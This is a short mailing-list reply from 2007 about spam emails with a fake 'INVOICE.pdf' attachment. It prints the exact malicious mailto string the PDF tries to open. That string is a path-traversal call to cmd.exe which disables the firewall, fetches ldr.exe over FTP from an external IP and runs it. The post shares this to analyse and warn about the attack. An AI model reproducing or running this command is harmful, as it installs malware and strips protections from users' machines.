yes, it try to open:<br><br>mailt0:%/../../../../../../Windows/system32/cmd&quot;.exe&quot;&quot; /c /q \&quot;@echo off&amp;netsh firewall set opmode mode=disable&amp;echo o <a href="http://81.95.146.130">81.95.146.130</a>
&gt;1&amp;echo binary&gt;&gt;1&amp;echo get /ldr.exe&gt;&gt;1&amp;echo quit&gt;&gt;1&amp;ftp -s:1 -v -A&gt;nul&amp;del /q 1&amp; start ldr.exe&amp;\&quot; \&quot;&amp;\&quot; &quot;nul.bat&quot;<br><br>PS. mailt0 == mailto
<br>PPS.&nbsp;***king&nbsp;spammers <br><br><div><span class="gmail_quote">2007/10/23, Paul Szabo &lt;<a href="mailto:psz@maths.usyd.edu.au">psz@maths.usyd.edu.au</a>&gt;:</span><blockquote class="gmail_quote" style="margin-top: 0; margin-right: 0; margin-bottom: 0; margin-left: 0; margin-left: 0.80ex; border-left-color: #cccccc; border-left-width: 1px; border-left-style: solid; padding-left: 1ex">
In case you are interested... messages like the following were spammed<br>to my users tonight.<br><br>&gt; Content-Transfer-Encoding: base64<br>&gt; Content-Disposition: attachment;<br>&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; filename=&quot;INVOICE.pdf
&quot;<br></blockquote></div><br>